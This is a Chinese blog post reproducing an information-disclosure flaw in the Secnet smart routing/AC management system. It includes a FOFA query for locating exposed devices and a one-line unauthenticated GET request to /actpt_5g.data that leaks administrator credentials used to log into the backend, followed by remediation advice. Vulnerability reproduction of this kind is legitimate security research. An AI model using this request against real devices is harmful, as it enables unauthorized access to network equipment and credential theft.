Secnet-智能路由系统 actpt_5g.data 信息泄露漏洞复现

已于 2024-05-10 15:22:39 修改
阅读量376 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-10 15:22:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138667158
版权

0x01 产品简介

Secnet安网智能AC管理系统是广州安网通信技术有限公司(简称“安网通信”)的无线AP管理系统。

0x02 漏洞概述

Secnet-智能路由系统 actpt_5g.data 接口存在信息泄露漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据,导致系统后台权限失控,处于极不安全状态。

0x03 影响范围

version <= 1.02.042

0x04 复现环境

FOFA:

title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统"

0x05 漏洞复现

PoC

GET /actpt_5g.data HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close

读取账号密码信息 

登录后台

0x06 修复建议

删除该接口页面或增加访问控制

升级至安全版本 

0xSecl
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
存在弱口令漏洞_【安全漏洞通告】secnet安网的AC集中管理平台存在弱口令漏洞...
weixin_39747595的博客
01-12 633
安全漏洞通告INFORMATIONsecnet安网的AC集中管理平台存在弱口令漏洞01漏洞背景广州安网通信技术有限公司(简称“安网通信”)是一家提供网络安全设备,网络通讯设备等网络产品和业务解决方案的服务商。AC(无线控制器):Wireless Access Point Controller。AC 集中管理是 AC+AP 的覆盖 的管理平台。功能概述:AC 集中管理平台能集中管理控制瘦 ...
安网SECNET的机器解密——wayos的ODM产品,帮大家解除相关的疑惑
weixin_34179968的博客
04-21 492
最近网上有一个安网的机器和WAYOS很像,里面的功能却一模一样,大家都在猜测,其实也不用猜了,我就把我自己的看法和大家讲一下吧。 这个固件肯定是WAYOS出的,但是是安网修改的,还是OEM的,这个得我抓包后才知道。但是可以肯定的是,这个机器绝对是使用WAYOS的固件 这个机器的芯片是Rallink RT3052F一体化芯片解决方案,这和945+是一样的,我也测试了固件,确实和945+一样 虽...
Goby 漏洞更新 |secnet-智能路由系统 actpt_5g.data 信息泄露
m0_46699477的博客
05-12 470
secnet安网智能AC管理系统是广州安网通信技术有限公司(简称“安网通信”)的无线AP管理系统secnet安网智能AC管理系统存在信息漏洞,攻击者可利用该漏洞获取敏感信息
漏洞复现Secnet-智能路由系统 actpt_5g.data信息泄露
siu~
05-15 491
Secnet智能路由系统 acipt 5g.data 接口存在信息泄露漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据,导致系统后台权限丢失。
Secnet安网 智能AC管理系统 actpt_5g接口敏感信息泄露复现 [附POC]
薛定谔嘚喵博客
12-13 178
Secnet安网 智能AC管理系统 actpt_5g 接口存在信息泄露漏洞,可获取用户密码信息
Goby 漏洞更新 |secnet-智能路由系统 actpt_5g,客户端开发面试题目
2401_84240554的博客
04-17 345
secnet安网智能AC管理系统是广州安网通信技术有限公司(简称“安网通信”)的无线AP管理系统secnet安网智能AC管理系统存在信息漏洞,攻击者可利用该漏洞获取敏感信息。攻击者可利用该漏洞获取AC智能路由系统WEB登录账号密码,登录AC智能路由系统获取WEB管理员权限,从而造成敏感信息泄露。IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
漏洞复现Secnet-智能路由系统弱口令
siu~
05-15 195
攻击者可直接利用弱口令登录系统
广州安*通信技术有限公司secnet安网智能AC管理系统信息泄露漏洞复现 CNVD-2022-86158
afei001
09-15 294
广州安*通信技术有限公司(简称“*网通信”)是一家专注于网络通信设备的研发、生产、销售及服务,并为用户提供网络安全路由器、交换机、防火墙、无线AP覆盖等网络产品和业务解决方案的服务商。 secnet安网智能AC管理系统存在敏感信息泄露漏洞,攻击者可利用该漏洞登录系统获取敏感信息
物业管理处网络门禁系统方案.docx
10-14
1. **系统概述**:NITRO SecNET网络门禁系统是基于先进的网络技术和智能硬件设备构建的,能够实现远程监控、实时数据传输和多级权限管理。系统通过集成读卡器、控制器、服务器和管理软件,确保了对人员进出的有效...
Advances in Security of Information and Communication Networks
04-26
Advances in Security of Information ...First International Conference, SecNet 2013, Cairo, Egypt, September 3-5, 2013. Proceedings Editors: Awad, Ali Ismail, Hassanien, Aboul-Ella, Baba, Kensuke (Eds.)
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1151
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 730
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1191
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 842
系统的外部可观察行为和物理特征
网络安全威胁情报到底是什么
学-> 思->用
07-10 479
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 528
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
使用Python实现深度学习模型:模型安全与防御
Echo_Wish的博客
07-12 475
通过以上步骤,我们实现了一个简单的深度学习模型的安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
移动应用安全需求分析与安全保护工程
weixin_48579910的博客
07-12 1108
移动应用安全面临许多威胁,包括数据泄露、恶意软件、应用漏洞、不安全的网络通信和数据存储等。通过实施数据保护、安全编码、网络通信安全、应用加固、权限管理、安全更新和用户教育等措施,可以有效地提高移动应用的安全性,保护用户数据和隐私。综合采用安全开发生命周期(SDL)和持续安全监控与响应策略,确保移动应用在整个生命周期内的安全性。Android系统通过一系列系统级、应用级和用户级的安全机制,提供了全面的保护。应用沙盒、权限模型、SELinux、数据加密、应用签名、代码混淆等措施,有效地防止了多种安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值